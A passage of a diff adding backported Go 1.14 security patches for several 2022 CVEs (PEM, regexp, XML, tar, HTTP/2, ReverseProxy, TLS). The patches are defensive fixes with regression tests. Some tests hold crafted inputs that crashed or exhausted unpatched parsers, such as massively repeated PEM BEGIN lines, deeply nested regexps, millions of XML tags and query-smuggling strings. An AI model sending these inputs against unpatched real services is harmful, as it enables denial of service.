+- // line is not a valid header line, therefore we cannot have consumed
+- // the preamble line for the any subsequent block. Thus, we will always
+- // find any valid block, no matter what bytes precede it.
+- //
+- // For example, if the input is
+- //
+- // -----BEGIN MALFORMED BLOCK-----
+- // junk that may look like header lines
+- // or data lines, but no END line
+- //
+- // -----BEGIN ACTUAL BLOCK-----
+- // realdata
+- // -----END ACTUAL BLOCK-----
+- //
+- // we've failed to parse using the first BEGIN line
+- // and now will try again, using the second BEGIN line.
+- p, rest := Decode(rest)
+- if p == nil {
+- rest = data
++ // the -1 is because we might have only matched pemEnd without the
++ // leading newline if the PEM block was empty.
++ _, rest = getLine(rest[endIndex+len(pemEnd)-1:])
++ return p, rest
+ }
+- return p, rest
+ }
+
+ const pemLineLength = 64
+diff --git a/src/encoding/pem/pem_test.go b/src/encoding/pem/pem_test.go
+index 8515b46..4485581 100644
+--- a/src/encoding/pem/pem_test.go
++++ b/src/encoding/pem/pem_test.go
+@@ -107,6 +107,12 @@ const pemMissingEndingSpace = `
+ dGVzdA==
+ -----ENDBAR-----`
+
++const pemMissingEndLine = `
++-----BEGIN FOO-----
++Header: 1`
++
++var pemRepeatingBegin = strings.Repeat("-----BEGIN \n", 10)
++
+ var badPEMTests = []struct {
+ name string
+ input string
+@@ -131,14 +137,34 @@ var badPEMTests = []struct {
+ "missing ending space",
+ pemMissingEndingSpace,
+ },
++ {
++ "repeating begin",
++ pemRepeatingBegin,
++ },
++ {
++ "missing end line",
++ pemMissingEndLine,
++ },
+ }
+
+ func TestBadDecode(t *testing.T) {
+ for _, test := range badPEMTests {
+- result, _ := Decode([]byte(test.input))
++ result, rest := Decode([]byte(test.input))
+ if result != nil {
+ t.Errorf("unexpected success while parsing %q", test.name)
+ }
++ if string(rest) != test.input {
++ t.Errorf("unexpected rest: %q; want = %q", rest, test.input)
++ }
++ }
++}
++
++func TestCVE202224675(t *testing.T) {
++ // Prior to CVE-2022-24675, this input would cause a stack overflow.
++ input := []byte(strings.Repeat("-----BEGIN \n", 10000000))
++ result, rest := Decode(input)
++ if result != nil || !reflect.DeepEqual(rest, input) {
++ t.Errorf("Encode of %#v decoded as %#v", input, rest)
+ }
+ }
+
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch
new file mode 100644
index 0000000000..e4270d8a75
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch
@@ -0,0 +1,198 @@
+From ba99f699d26483ea1045f47c760e9be30799e311 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Wed, 2 Feb 2022 16:41:32 -0500
+Subject: [PATCH] regexp/syntax: reject very deeply nested regexps in Parse
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/2b65cde5868d8245ef8a0b8eba1e361440252d3b]
+CVE: CVE-2022-24921
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org
+
+
+The regexp code assumes it can recurse over the structure of
+a regexp safely. Go's growable stacks make that reasonable
+for all plausible regexps, but implausible ones can reach the
+“infinite recursion?” stack limit.
+
+This CL limits the depth of any parsed regexp to 1000.
+That is, the depth of the parse tree is required to be ≤ 1000.
+Regexps that require deeper parse trees will return ErrInternalError.
+A future CL will change the error to ErrInvalidDepth,
+but using ErrInternalError for now avoids introducing new API
+in point releases when this is backported.
+
+Fixes #51112.
+Fixes #51117.
+
+Change-Id: I97d2cd82195946eb43a4ea8561f5b95f91fb14c5
+Reviewed-on: https://go-review.googlesource.com/c/go/+/384616
+Trust: Russ Cox <rsc@golang.org>
+Run-TryBot: Russ Cox <rsc@golang.org>
+Reviewed-by: Ian Lance Taylor <iant@golang.org>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/384855
+---
+ src/regexp/syntax/parse.go | 72 ++++++++++++++++++++++++++++++++-
+ src/regexp/syntax/parse_test.go | 7 ++++
+ 2 files changed, 77 insertions(+), 2 deletions(-)
+
+diff --git a/src/regexp/syntax/parse.go b/src/regexp/syntax/parse.go
+index 8c6d43a..55bd20d 100644
+--- a/src/regexp/syntax/parse.go
++++ b/src/regexp/syntax/parse.go
+@@ -76,13 +76,29 @@ const (
+ opVerticalBar
+ )
+
++// maxHeight is the maximum height of a regexp parse tree.
++// It is somewhat arbitrarily chosen, but the idea is to be large enough
++// that no one will actually hit in real use but at the same time small enough
++// that recursion on the Regexp tree will not hit the 1GB Go stack limit.
++// The maximum amount of stack for a single recursive frame is probably
++// closer to 1kB, so this could potentially be raised, but it seems unlikely
++// that people have regexps nested even this deeply.
++// We ran a test on Google's C++ code base and turned up only
++// a single use case with depth > 100; it had depth 128.
++// Using depth 1000 should be plenty of margin.
++// As an optimization, we don't even bother calculating heights
++// until we've allocated at least maxHeight Regexp structures.
++const maxHeight = 1000
++
+ type parser struct {
+ flags Flags // parse mode flags
+ stack []*Regexp // stack of parsed expressions
+ free *Regexp
+ numCap int // number of capturing groups seen
+ wholeRegexp string
+- tmpClass []rune // temporary char class work space
++ tmpClass []rune // temporary char class work space
++ numRegexp int // number of regexps allocated
++ height map[*Regexp]int // regexp height for height limit check
+ }
+
+ func (p *parser) newRegexp(op Op) *Regexp {
+@@ -92,16 +108,52 @@ func (p *parser) newRegexp(op Op) *Regexp {
+ *re = Regexp{}
+ } else {
+ re = new(Regexp)
++ p.numRegexp++
+ }
+ re.Op = op
+ return re
+ }
+
+ func (p *parser) reuse(re *Regexp) {
++ if p.height != nil {
++ delete(p.height, re)
++ }
+ re.Sub0[0] = p.free
+ p.free = re
+ }
+
++func (p *parser) checkHeight(re *Regexp) {
++ if p.numRegexp < maxHeight {
++ return
++ }
++ if p.height == nil {
++ p.height = make(map[*Regexp]int)
++ for _, re := range p.stack {
++ p.checkHeight(re)
++ }
++ }
++ if p.calcHeight(re, true) > maxHeight {
++ panic(ErrInternalError)
++ }
++}
++
++func (p *parser) calcHeight(re *Regexp, force bool) int {
++ if !force {
++ if h, ok := p.height[re]; ok {
++ return h
++ }
++ }
++ h := 1
++ for _, sub := range re.Sub {
++ hsub := p.calcHeight(sub, false)
++ if h < 1+hsub {
++ h = 1 + hsub
++ }
++ }
++ p.height[re] = h
++ return h
++}
++
+ // Parse stack manipulation.
+
+ // push pushes the regexp re onto the parse stack and returns the regexp.
+@@ -137,6 +189,7 @@ func (p *parser) push(re *Regexp) *Regexp {
+ }
+
+ p.stack = append(p.stack, re)
++ p.checkHeight(re)
+ return re
+ }
+
+@@ -252,6 +305,7 @@ func (p *parser) repeat(op Op, min, max int, before, after, lastRepeat string) (
+ re.Sub = re.Sub0[:1]
+ re.Sub[0] = sub
+ p.stack[n-1] = re
++ p.checkHeight(re)
+
+ if op == OpRepeat && (min >= 2 || max >= 2) && !repeatIsValid(re, 1000) {
+ return "", &Error{ErrInvalidRepeatSize, before[:len(before)-len(after)]}
+@@ -699,6 +753,21 @@ func literalRegexp(s string, flags Flags) *Regexp {
+ // Flags, and returns a regular expression parse tree. The syntax is
+ // described in the top-level comment.
+ func Parse(s string, flags Flags) (*Regexp, error) {
++ return parse(s, flags)
++}
++
++func parse(s string, flags Flags) (_ *Regexp, err error) {
++ defer func() {
++ switch r := recover(); r {
++ default:
++ panic(r)
++ case nil:
++ // ok
++ case ErrInternalError:
++ err = &Error{Code: ErrInternalError, Expr: s}
++ }
++ }()
++
+ if flags&Literal != 0 {
+ // Trivial parser for literal string.
+ if err := checkUTF8(s); err != nil {
+@@ -710,7 +779,6 @@ func Parse(s string, flags Flags) (*Regexp, error) {
+ // Otherwise, must do real work.
+ var (
+ p parser
+- err error
+ c rune
+ op Op
+ lastRepeat string
+diff --git a/src/regexp/syntax/parse_test.go b/src/regexp/syntax/parse_test.go
+index 5581ba1..1ef6d8a 100644
+--- a/src/regexp/syntax/parse_test.go
++++ b/src/regexp/syntax/parse_test.go
+@@ -207,6 +207,11 @@ var parseTests = []parseTest{
+ // Valid repetitions.
+ {`((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}))`, ``},
+ {`((((((((((x{1}){2}){2}){2}){2}){2}){2}){2}){2}){2})`, ``},
++
++ // Valid nesting.
++ {strings.Repeat("(", 999) + strings.Repeat(")", 999), ``},
++ {strings.Repeat("(?:", 999) + strings.Repeat(")*", 999), ``},
++ {"(" + strings.Repeat("|", 12345) + ")", ``}, // not nested at all
+ }
+
+ const testFlags = MatchNL | PerlX | UnicodeGroups
+@@ -482,6 +487,8 @@ var invalidRegexps = []string{
+ `a{100000}`,
+ `a{100000,}`,
+ "((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}){2})",
++ strings.Repeat("(", 1000) + strings.Repeat(")", 1000),
++ strings.Repeat("(?:", 1000) + strings.Repeat(")*", 1000),
+ `\Q\E*`,
+ }
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch
new file mode 100644
index 0000000000..238c3eac5b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch
@@ -0,0 +1,68 @@
+From 48c9076dcfc2dc894842ff758c8cfae7957c9565 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 29 Sep 2022 17:06:18 +0530
+Subject: [PATCH] CVE-2022-27664
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479]
+CVE: CVE-2022-27664
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/net/http/h2_bundle.go | 21 +++++++++++++--------
+ 1 file changed, 13 insertions(+), 8 deletions(-)
+
+diff --git a/src/net/http/h2_bundle.go b/src/net/http/h2_bundle.go
+index 65d851d..83f2a72 100644
+--- a/src/net/http/h2_bundle.go
++++ b/src/net/http/h2_bundle.go
+@@ -3254,10 +3254,11 @@ var (
+ // name (key). See httpguts.ValidHeaderName for the base rules.
+ //
+ // Further, http2 says:
+-// "Just as in HTTP/1.x, header field names are strings of ASCII
+-// characters that are compared in a case-insensitive
+-// fashion. However, header field names MUST be converted to
+-// lowercase prior to their encoding in HTTP/2. "
++//
++// "Just as in HTTP/1.x, header field names are strings of ASCII
++// characters that are compared in a case-insensitive
++// fashion. However, header field names MUST be converted to
++// lowercase prior to their encoding in HTTP/2. "
+ func http2validWireHeaderFieldName(v string) bool {
+ if len(v) == 0 {
+ return false
+@@ -3446,8 +3447,8 @@ func (s *http2sorter) SortStrings(ss []string) {
+ // validPseudoPath reports whether v is a valid :path pseudo-header
+ // value. It must be either:
+ //
+-// *) a non-empty string starting with '/'
+-// *) the string '*', for OPTIONS requests.
++// *) a non-empty string starting with '/'
++// *) the string '*', for OPTIONS requests.
+ //
+ // For now this is only used a quick check for deciding when to clean
+ // up Opaque URLs before sending requests from the Transport.
+@@ -4897,6 +4898,9 @@ func (sc *http2serverConn) startGracefulShutdownInternal() {
+ func (sc *http2serverConn) goAway(code http2ErrCode) {
+ sc.serveG.check()
+ if sc.inGoAway {
++ if sc.goAwayCode == http2ErrCodeNo {
++ sc.goAwayCode = code
++ }
+ return
+ }
+ sc.inGoAway = true
+@@ -6091,8 +6095,9 @@ func (rws *http2responseWriterState) writeChunk(p []byte) (n int, err error) {
+ // prior to the headers being written. If the set of trailers is fixed
+ // or known before the header is written, the normal Go trailers mechanism
+ // is preferred:
+-// https://golang.org/pkg/net/http/#ResponseWriter
+-// https://golang.org/pkg/net/http/#example_ResponseWriter_trailers
++//
++// https://golang.org/pkg/net/http/#ResponseWriter
++// https://golang.org/pkg/net/http/#example_ResponseWriter_trailers
+ const http2TrailerPrefix = "Trailer:"
+
+ // promoteUndeclaredTrailers permits http.Handlers to set trailers
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch
new file mode 100644
index 0000000000..8afa292144
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch
@@ -0,0 +1,104 @@
+From 8136eb2e5c316a51d0da710fbd0504cbbefee526 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Mon, 28 Mar 2022 18:41:26 -0700
+Subject: [PATCH] encoding/xml: use iterative Skip, rather than recursive
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/58facfbe7db2fbb9afed794b281a70bdb12a60ae]
+CVE: CVE-2022-28131
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+Prevents exhausting the stack limit in _incredibly_ deeply nested
+structures.
+
+Fixes #53711
+Updates #53614
+Fixes CVE-2022-28131
+
+Change-Id: I47db4595ce10cecc29fbd06afce7b299868599e6
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1419912
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit 9278cb78443d2b4deb24cbb5b61c9ba5ac688d49)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/417068
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Heschi Kreinick <heschi@google.com>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+---
+ src/encoding/xml/read.go | 15 ++++++++-------
+ src/encoding/xml/read_test.go | 18 ++++++++++++++++++
+ 2 files changed, 26 insertions(+), 7 deletions(-)
+
+diff --git a/src/encoding/xml/read.go b/src/encoding/xml/read.go
+index 4ffed80..3fac859 100644
+--- a/src/encoding/xml/read.go
++++ b/src/encoding/xml/read.go
+@@ -743,12 +743,12 @@ Loop:
+ }
+
+ // Skip reads tokens until it has consumed the end element
+-// matching the most recent start element already consumed.
+-// It recurs if it encounters a start element, so it can be used to
+-// skip nested structures.
++// matching the most recent start element already consumed,
++// skipping nested structures.
+ // It returns nil if it finds an end element matching the start
+ // element; otherwise it returns an error describing the problem.
+ func (d *Decoder) Skip() error {
++ var depth int64
+ for {
+ tok, err := d.Token()
+ if err != nil {
+@@ -756,11 +756,12 @@ func (d *Decoder) Skip() error {
+ }
+ switch tok.(type) {
+ case StartElement:
+- if err := d.Skip(); err != nil {
+- return err
+- }
++ depth++
+ case EndElement:
+- return nil
++ if depth == 0 {
++ return nil
++ }
++ depth--
+ }
+ }
+ }
+diff --git a/src/encoding/xml/read_test.go b/src/encoding/xml/read_test.go
+index 6a20b1a..7a621a5 100644
+--- a/src/encoding/xml/read_test.go
++++ b/src/encoding/xml/read_test.go
+@@ -5,9 +5,11 @@
+ package xml
+
+ import (
++ "bytes"
+ "errors"
+ "io"
+ "reflect"
++ "runtime"
+ "strings"
+ "testing"
+ "time"
+@@ -1093,3 +1095,19 @@ func TestCVE202228131(t *testing.T) {
+ t.Fatalf("Unmarshal unexpected error: got %q, want %q", err, errExeceededMaxUnmarshalDepth)
+ }
+ }
++
++func TestCVE202230633(t *testing.T) {
++ if runtime.GOARCH == "wasm" {
++ t.Skip("causes memory exhaustion on js/wasm")
++ }
++ defer func() {
++ p := recover()
++ if p != nil {
++ t.Fatal("Unmarshal panicked")
++ }
++ }()
++ var example struct {
++ Things []string
++ }
++ Unmarshal(bytes.Repeat([]byte("<a>"), 17_000_000), &example)
++}
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch
new file mode 100644
index 0000000000..6361deec7d
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch
@@ -0,0 +1,36 @@
+From 34d9ab78568d63d8097911237897b188bdaba9c2 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Thu, 31 Mar 2022 12:31:58 -0400
+Subject: [PATCH] crypto/elliptic: tolerate zero-padded scalars in generic
+ P-256
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/7139e8b024604ab168b51b99c6e8168257a5bf58]
+CVE: CVE-2022-28327
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+Updates #52075
+Fixes #52076
+Fixes CVE-2022-28327
+
+Change-Id: I595a7514c9a0aa1b9c76aedfc2307e1124271f27
+Reviewed-on: https://go-review.googlesource.com/c/go/+/397136
+Trust: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Julie Qiu <julie@golang.org>
+---
+ src/crypto/elliptic/p256.go | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/crypto/elliptic/p256.go b/src/crypto/elliptic/p256.go
+index c23e414..787e3e7 100644
+--- a/src/crypto/elliptic/p256.go
++++ b/src/crypto/elliptic/p256.go
+@@ -51,7 +51,7 @@ func p256GetScalar(out *[32]byte, in []byte) {
+ n := new(big.Int).SetBytes(in)
+ var scalarBytes []byte
+
+- if n.Cmp(p256Params.N) >= 0 {
++ if n.Cmp(p256Params.N) >= 0 || len(in) > len(out) {
+ n.Mod(n, p256Params.N)
+ scalarBytes = n.Bytes()
+ } else {
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch
new file mode 100644
index 0000000000..ea04a82d16
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch
@@ -0,0 +1,111 @@
+From 9d339f1d0f53c4116a7cb4acfa895f31a07212ee Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Fri, 2 Sep 2022 20:45:18 -0700
+Subject: [PATCH] archive/tar: limit size of headers
+
+Set a 1MiB limit on special file blocks (PAX headers, GNU long names,
+GNU link names), to avoid reading arbitrarily large amounts of data
+into memory.
+
+Thanks to Adam Korczynski (ADA Logics) and OSS-Fuzz for reporting
+this issue.
+
+Fixes CVE-2022-2879
+Updates #54853
+Fixes #55926
+
+Change-Id: I85136d6ff1e0af101a112190e027987ab4335680
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1565555
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+(cherry picked from commit 6ee768cef6b82adf7a90dcf367a1699ef694f3b2)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1591053
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/438498
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/0a723816cd2]
+CVE: CVE-2022-2879
+Signed-off-by: Sunil Kumar <sukumar@mvista.com>
+---
+ src/archive/tar/format.go | 4 ++++
+ src/archive/tar/reader.go | 14 ++++++++++++--
+ src/archive/tar/writer.go | 3 +++
+ 3 files changed, 19 insertions(+), 2 deletions(-)
+
+diff --git a/src/archive/tar/format.go b/src/archive/tar/format.go
+index cfe24a5..6642364 100644
+--- a/src/archive/tar/format.go
++++ b/src/archive/tar/format.go
+@@ -143,6 +143,10 @@ const (
+ blockSize = 512 // Size of each block in a tar stream
+ nameSize = 100 // Max length of the name field in USTAR format
+ prefixSize = 155 // Max length of the prefix field in USTAR format
++
++ // Max length of a special file (PAX header, GNU long name or link).
++ // This matches the limit used by libarchive.
++ maxSpecialFileSize = 1 << 20
+ )
+
+ // blockPadding computes the number of bytes needed to pad offset up to the
+diff --git a/src/archive/tar/reader.go b/src/archive/tar/reader.go
+index 4f9135b..e996595 100644
+--- a/src/archive/tar/reader.go
++++ b/src/archive/tar/reader.go
+@@ -104,7 +104,7 @@ func (tr *Reader) next() (*Header, error) {
+ continue // This is a meta header affecting the next header
+ case TypeGNULongName, TypeGNULongLink:
+ format.mayOnlyBe(FormatGNU)
+- realname, err := ioutil.ReadAll(tr)
++ realname, err := readSpecialFile(tr)
+ if err != nil {
+ return nil, err
+ }
+@@ -294,7 +294,7 @@ func mergePAX(hdr *Header, paxHdrs map[string]string) (err error) {
+ // parsePAX parses PAX headers.
+ // If an extended header (type 'x') is invalid, ErrHeader is returned
+ func parsePAX(r io.Reader) (map[string]string, error) {
+- buf, err := ioutil.ReadAll(r)
++ buf, err := readSpecialFile(r)
+ if err != nil {
+ return nil, err
+ }
+@@ -827,6 +827,16 @@ func tryReadFull(r io.Reader, b []byte) (n int, err error) {
+ return n, err
+ }
+
++// readSpecialFile is like ioutil.ReadAll except it returns
++// ErrFieldTooLong if more than maxSpecialFileSize is read.
++func readSpecialFile(r io.Reader) ([]byte, error) {
++ buf, err := ioutil.ReadAll(io.LimitReader(r, maxSpecialFileSize+1))
++ if len(buf) > maxSpecialFileSize {
++ return nil, ErrFieldTooLong
++ }
++ return buf, err
++}
++
+ // discard skips n bytes in r, reporting an error if unable to do so.
+ func discard(r io.Reader, n int64) error {
+ // If possible, Seek to the last byte before the end of the data section.
+diff --git a/src/archive/tar/writer.go b/src/archive/tar/writer.go
+index e80498d..893eac0 100644
+--- a/src/archive/tar/writer.go
++++ b/src/archive/tar/writer.go
+@@ -199,6 +199,9 @@ func (tw *Writer) writePAXHeader(hdr *Header, paxHdrs map[string]string) error {
+ flag = TypeXHeader
+ }
+ data := buf.String()
++ if len(data) > maxSpecialFileSize {
++ return ErrFieldTooLong
++ }
+ if err := tw.writeRawFile(name, data, flag, FormatPAX); err != nil || isGlobal {
+ return err // Global headers return here
+ }
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch
new file mode 100644
index 0000000000..8376dc45ba
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch
@@ -0,0 +1,164 @@
+From 753e3f8da191c2ac400407d83c70f46900769417 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 27 Oct 2022 12:22:41 +0530
+Subject: [PATCH] CVE-2022-2880
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/9d2c73a9fd69e45876509bb3bdb2af99bf77da1e]
+CVE: CVE-2022-2880
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+net/http/httputil: avoid query parameter
+
+Query parameter smuggling occurs when a proxy's interpretation
+of query parameters differs from that of a downstream server.
+Change ReverseProxy to avoid forwarding ignored query parameters.
+
+Remove unparsable query parameters from the outbound request
+
+ * if req.Form != nil after calling ReverseProxy.Director; and
+ * before calling ReverseProxy.Rewrite.
+
+This change preserves the existing behavior of forwarding the
+raw query untouched if a Director hook does not parse the query
+by calling Request.ParseForm (possibly indirectly).
+---
+ src/net/http/httputil/reverseproxy.go | 36 +++++++++++
+ src/net/http/httputil/reverseproxy_test.go | 74 ++++++++++++++++++++++
+ 2 files changed, 110 insertions(+)
+
+diff --git a/src/net/http/httputil/reverseproxy.go b/src/net/http/httputil/reverseproxy.go
+index 2072a5f..c6fb873 100644
+--- a/src/net/http/httputil/reverseproxy.go
++++ b/src/net/http/httputil/reverseproxy.go
+@@ -212,6 +212,9 @@ func (p *ReverseProxy) ServeHTTP(rw http.ResponseWriter, req *http.Request) {
+ }
+
+ p.Director(outreq)
++ if outreq.Form != nil {
++ outreq.URL.RawQuery = cleanQueryParams(outreq.URL.RawQuery)
++ }
+ outreq.Close = false
+
+ reqUpType := upgradeType(outreq.Header)
+@@ -561,3 +564,36 @@ func (c switchProtocolCopier) copyToBackend(errc chan<- error) {
+ _, err := io.Copy(c.backend, c.user)
+ errc <- err
+ }
++
++func cleanQueryParams(s string) string {
++ reencode := func(s string) string {
++ v, _ := url.ParseQuery(s)
++ return v.Encode()
++ }
++ for i := 0; i < len(s); {
++ switch s[i] {
++ case ';':
++ return reencode(s)
++ case '%':
++ if i+2 >= len(s) || !ishex(s[i+1]) || !ishex(s[i+2]) {
++ return reencode(s)
++ }
++ i += 3
++ default:
++ i++
++ }
++ }
++ return s
++}
++
++func ishex(c byte) bool {
++ switch {
++ case '0' <= c && c <= '9':
++ return true
++ case 'a' <= c && c <= 'f':
++ return true
++ case 'A' <= c && c <= 'F':
++ return true
++ }
++ return false
++}
+diff --git a/src/net/http/httputil/reverseproxy_test.go b/src/net/http/httputil/reverseproxy_test.go
+index 9a7223a..bc87a3b 100644
+--- a/src/net/http/httputil/reverseproxy_test.go
++++ b/src/net/http/httputil/reverseproxy_test.go
+@@ -1269,3 +1269,77 @@ func TestSingleJoinSlash(t *testing.T) {
+ }
+ }
+ }
++
++const (
++ testWantsCleanQuery = true
++ testWantsRawQuery = false
++)
++
++func TestReverseProxyQueryParameterSmugglingDirectorDoesNotParseForm(t *testing.T) {
++ testReverseProxyQueryParameterSmuggling(t, testWantsRawQuery, func(u *url.URL) *ReverseProxy {
++ proxyHandler := NewSingleHostReverseProxy(u)
++ oldDirector := proxyHandler.Director
++ proxyHandler.Director = func(r *http.Request) {
++ oldDirector(r)
++ }
++ return proxyHandler
++ })
++}
++
++func TestReverseProxyQueryParameterSmugglingDirectorParsesForm(t *testing.T) {
++ testReverseProxyQueryParameterSmuggling(t, testWantsCleanQuery, func(u *url.URL) *ReverseProxy {
++ proxyHandler := NewSingleHostReverseProxy(u)
++ oldDirector := proxyHandler.Director
++ proxyHandler.Director = func(r *http.Request) {
++ // Parsing the form causes ReverseProxy to remove unparsable
++ // query parameters before forwarding.
++ r.FormValue("a")
++ oldDirector(r)
++ }
++ return proxyHandler
++ })
++}
++
++func testReverseProxyQueryParameterSmuggling(t *testing.T, wantCleanQuery bool, newProxy func(*url.URL) *ReverseProxy) {
++ const content = "response_content"
++ backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
++ w.Write([]byte(r.URL.RawQuery))
++ }))
++ defer backend.Close()
++ backendURL, err := url.Parse(backend.URL)
++ if err != nil {
++ t.Fatal(err)
++ }
++ proxyHandler := newProxy(backendURL)
++ frontend := httptest.NewServer(proxyHandler)
++ defer frontend.Close()
++
++ // Don't spam output with logs of queries containing semicolons.
++ backend.Config.ErrorLog = log.New(io.Discard, "", 0)
++ frontend.Config.ErrorLog = log.New(io.Discard, "", 0)
++
++ for _, test := range []struct {
++ rawQuery string
++ cleanQuery string
++ }{{
++ rawQuery: "a=1&a=2;b=3",
++ cleanQuery: "a=1",
++ }, {
++ rawQuery: "a=1&a=%zz&b=3",
++ cleanQuery: "a=1&b=3",
++ }} {
++ res, err := frontend.Client().Get(frontend.URL + "?" + test.rawQuery)
++ if err != nil {
++ t.Fatalf("Get: %v", err)
++ }
++ defer res.Body.Close()
++ body, _ := io.ReadAll(res.Body)
++ wantQuery := test.rawQuery
++ if wantCleanQuery {
++ wantQuery = test.cleanQuery
++ }
++ if got, want := string(body), wantQuery; got != want {
++ t.Errorf("proxy forwarded raw query %q as %q, want %q", test.rawQuery, got, want)
++ }
++ }
++}
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch
new file mode 100644
index 0000000000..47313a547f
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch
@@ -0,0 +1,47 @@
+From 8d0bbb5a6280c2cf951241ec7f6579c90d38df57 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 25 Aug 2022 10:55:08 +0530
+Subject: [PATCH] CVE-2022-30629
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/c15a8e2dbb5ac376a6ed890735341b812d6b965c]
+CVE: CVE-2022-30629
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/crypto/tls/handshake_server_tls13.go | 14 ++++++++++++++
+ 1 file changed, 14 insertions(+)
+
+diff --git a/src/crypto/tls/handshake_server_tls13.go b/src/crypto/tls/handshake_server_tls13.go
+index 5432145..d91797e 100644
+--- a/src/crypto/tls/handshake_server_tls13.go
++++ b/src/crypto/tls/handshake_server_tls13.go
+@@ -9,6 +9,7 @@ import (
+ "crypto"
+ "crypto/hmac"
+ "crypto/rsa"
++ "encoding/binary"
+ "errors"
+ "hash"
+ "io"
+@@ -742,6 +743,19 @@ func (hs *serverHandshakeStateTLS13) sendSessionTickets() error {
+ }
+ m.lifetime = uint32(maxSessionTicketLifetime / time.Second)
+
++ // ticket_age_add is a random 32-bit value. See RFC 8446, section 4.6.1
++ // The value is not stored anywhere; we never need to check the ticket age
++ // because 0-RTT is not supported.
++ ageAdd := make([]byte, 4)
++ _, err = hs.c.config.rand().Read(ageAdd)
++ if err != nil {
++ return err
++ }
++ m.ageAdd = binary.LittleEndian.Uint32(ageAdd)
++
++ // ticket_nonce, which must be unique per connection, is always left at
++ // zero because we only ever send one ticket per connection.
++
+ if _, err := c.writeRecord(recordTypeHandshake, m.marshal()); err != nil {
+ return err
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch
new file mode 100644
index 0000000000..5dcfd27f16
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch
@@ -0,0 +1,116 @@
+From d10fc3a84e3344f2421c1dd3046faa50709ab4d5 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
